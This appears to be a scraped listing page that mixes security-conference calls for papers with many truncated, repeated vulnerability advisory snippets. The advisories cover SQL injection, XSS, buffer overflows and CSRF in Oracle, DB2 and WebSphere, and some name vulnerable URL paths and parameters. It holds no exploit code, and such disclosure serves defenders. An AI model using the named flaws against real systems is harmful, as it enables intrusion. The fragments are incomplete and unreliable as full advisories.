Next Page >>
application security
We are seeking training proposals on the following topics (in no particular order):
- Application Threat Modeling
- Business Risks with Application Security
- Hands-on Source Code Review
- Metrics for Application Security
There will be training courses on November 24 followed by plenary sessions on the 25 and 26 with multiple tracks per day.
We are seeking training proposals on the following topics (in no particular order):
- Application Threat Modeling
- Business Risks with Application Security
- Hands-on Source Code Review
- Metrics for Application Security
- OWASP Tools and Projects
- Privacy Concerns with Applications and Data Storage
- Secure Coding Practices (J2EE/.NET)
On Wed, Oct 12, 2011 at 9:43 AM, AppSec DC <cfp@appsecdc.org> wrote:
>
> Colleagues,
>
> Building on the success of AppSec DC 2010 and 2009, OWASP is pleased to announce the next OWASP AppSec DC conference. The theme for this year's conference is "OWASP - Not just webapps anymore" to reflect the new and revised scope of OWASP to include all application security issues instead of focusing just on web application security.
>
> Owing to feedback from the past two years, and in alignment with the overall OWASP Conference mission, the AppSec DC Planners have decided to move the conference to April of 2012. This is in response to requests from a variety of our sponsors and vendors, and de-conflicts overlap in the OWASP conference schedule for North America. OWASP AppSec DC 2012 will be held at the Walter E. Washington Convention Center on April 2nd through April 5th. Plenary sessions will be on April 4th and 5th preceded by Application Security Training on April 2nd and 3rd.
>
> In accordance with the broader OWASP mission stemming from the 2011 OWASP Global Summit, AppSec DC is working to reflect the move of OWASP towards embracing all facets of Application Security, and not restricting it's content to strictly to the realm of web applications. Therefore we invite all practitioners of application security and those who work with or interact with all facets of application security to submit papers and participate in the conference.
>
Colleagues,
Building on the success of AppSec DC 2010 and 2009, OWASP is pleased
to announce the next OWASP AppSec DC conference. The theme for this
year's conference is "OWASP - Not just webapps anymore" to reflect the
new and revised scope of OWASP to include all application security
issues instead of focusing just on web application security.
Owing to feedback from the past two years, and in alignment with the
overall OWASP Conference mission, the AppSec DC Planners have decided
to move the conference to April of 2012. This is in response to
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Ariel Sanchez of
Application Security Inc.
Details:
Buffer overflow on sysproc.auth_list_groups_for_authid function. By
passing an overly long value of more then 40-bytes to the
auth_list_groups_for_authid function, a stack-based buffer can be
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martnez
Fay of Application Security Inc.
Details:
Oracle Database Server provides the SYS.DBMS_AQADM_SYS package that is
used internally by the SYS.DBMS_AQADM package to provide procedures to
manage Oracle Streams Advanced Queuing (AQ) configuration and
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martnez
Fay of Application Security Inc.
Details:
Oracle Database Server provides the MDSYS.SDO_CS package that contains
subprograms for working with coordinate systems. This package contains
the function TRANSFORM which is vulnerable to buffer overflow attacks.
'FORM', making the application vulnerable to Cross-Site Request Forgery.
The vulnerable areas of the WebSphere administrative console include the
'Security > Global Security' panel [6], and the 'Save changes to the
master configuration' feature. This makes possible for a remote attacker
to disable the 'Administrative Security', 'Application Security' and
'Java 2 Security' options, and then to save the changes to the
configuration, by tricking an IBM WebSphere administrator which is
currently logged in to the administrative console to visit a malicious
web page. Also note that IBM WebSphere 7.0 with Fix Pack 11 did not
include a 'csrfid' token for the 'Save changes to the master
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Martin Rakhmanov of
Application Security Inc.
Details:
RESTORE DATABASE command is prone to internal sql injection allowing
malicious users to run SQL code with highest privileges.
To exploit this vulnerability an attacker must possess CREATE DATABASE
Remote exploitable:
Yes (Authentication is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martnez Fay of Application Security Inc.
Details:
SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed.
The 'Type', 'snapshot' and 'table' parameters used in web page /em/console/ecm/history/configHistory and 'fConfigGuid' parameter used in /em/console/ecm/config/compare/compareWizSecondConfig are vulnerable to SQL Injection attacks. These web pages are part of Oracle Enterprise Manager web application. It may be possible for a malicious user to execute a function with the elevated privileges of the SYSMAN database user in the repository database. This user has the DBA role granted.
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers allowing an attacker to
make the server print one (or more) new line sequences in the header
Remote exploitable:
Yes (No authentication is required)
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
Finally there is a public ModSecurity course you can attend!
As part of the upcoming OWASP/WASC AppSec 2007 conference in San Jose,
Ryan Barnett is going to give a two day ModSecurity Boot-Camp Training
course on Nov 12th and 13th. For those of you who don't know Ryan, he is
ModSecurity Community Manager and Director of Application Security
Training at Breach Security, and one of the best ModSecurity experts out
there.
As an additional bonus, Ivan Ristic, The creator of ModSecurity will
also be in attendance for portions of the class. So, if you ever wanted
Oracle Enterprise Manager control included in Oracle Database versions 10.1.0.5, 10.2.0.3, 10.2.0.4
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security, Inc.
Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.
There are instances of XSS vulnerabilities in the Event Management component of Oracle Enterprise Manager Grid Control. For example the 'value' parameter of /em/console/pref/notifRuleInfo$mode web page is vulnerable to this kind of attacks.
Hi everyone,
We're happy to announce that the sixth annual SANS AppSec Summit will be
held in Las Vegas, Nevada on April 30 - May 1, 2012.
The theme for this conference is "Application Security at Scale".
Billions of records in the cloud. Millions of smart mobile devices.
Millions of developers writing new code. Hundreds of apps in your
enterprise. Untold numbers of existing bugs. Unknown numbers of
"sophisticated" attackers exploiting your software. What cutting edge
Oracle Enterprise Manager control included in Oracle Database versions 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, 11.2.0.2
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security, Inc.
Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.
There are instances of XSS vulnerabilities in the Instance Management component of Oracle Enterprise Manager Grid Control. For example the 'commentinput' parameter of /em/console/database/monitoring/metricDetail$type web page is vulnerable to this kind of attacks.
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Authenticating a web user without invalidating any existing session
identifier gives an attacker the opportunity to steal authenticated
sessions.
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers allowing an attacker to
make the server print one (or more) new line sequences in the header
Remote exploitable:
Yes (No authentication is required)
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
Remote exploitable:
Yes (No authentication is required)
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
The call for papers ends in seven days on February 1, 2012 so submit today!
============
The theme for this conference is "Application Security at Scale".
Billions of records in the cloud. Millions of smart mobile devices.
Millions of developers writing new code. Hundreds of apps in your
enterprise. Untold numbers of existing bugs. Unknown numbers of
"sophisticated" attackers exploiting your software. What cutting edge
Remote exploitable:
Yes (No authentication is required)
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
Oracle Enterprise Manager control included in Oracle Database versions 10.1.0.5, 10.2.0.3, 10.2.0.4, 11.1.0.7
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security, Inc.
Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.
There are instances of XSS vulnerabilities in the Instance Management component of Oracle Enterprise Manager Grid Control. For example, the 'datasource' parameter of /em/console/database/instance/sitemap web page is vulnerable to this kind of attacks.
> OWASP is currently soliciting training providers for the OWASP AppSec DC
> 2012 regional conference that will take place at the Walter E. Washington
> Convention Center (801 Mount Vernon Place NW Washington, DC 20001) on April
> 2nd through 5th of 2012. The theme for this year's conference is "OWASP -
> Not just webapps anymore" to reflect the new and revised scope of OWASP to
> include all application security issues instead of focusing just on web
> application security. There will be training courses on April 2nd and 3rd
> followed by plenary sessions on the 4th and 5th. There are a total of six
> classrooms over two days or 12 training days available at the conference.
> Three classrooms hold 30 students and the other three have a capacity of 24
> students.
BLACK HAT WASHINGTON DC CFP NOW OPEN
Held February 16-19, 2009 at the Hyatt Regency Crystal City. Black Hat DC is
the leading security conference focused on the needs of government and
infrastructure security professionals, with tracks focused on Hardware and
Embedded Devices, Reverse Engineering and Malware, Client Wars and
Application Security, and Forensics and Network Protection. We hope to see
you there for another highly technical and refreshingly vendor-neutral
event.
Submitters will have until January 1 to get their papers into the Black Hat
CFP system at :
Hope to see you in Vegas!
============
The theme for this conference is "Application Security at Scale".
Billions of records in the cloud. Millions of smart mobile devices.
Millions of developers writing new code. Hundreds of apps in your
enterprise. Untold numbers of existing bugs. Unknown numbers of
"sophisticated" attackers exploiting your software. What cutting edge
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martnez
Fay of Application Security Inc.
Details:
Oracle Database Server provides the SYS.DBMS_AQJMS_INTERNAL package.
This package contains the procedures AQ$_REGISTER and AQ$_UNREGISTER
which are vulnerable to buffer overflow attacks.
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
These vulnerabilities were discovered and researched by Ariel Sanchez of
Application Security Inc.
Details:
DB2 has multiple vulnerabilities which can lead to Denial of Service
(DoS) attacks against the instance. When RECOVERJAR and REMOVE_JAR
procedures are called with a specially crafted parameter the DB2
Next Page>>
|
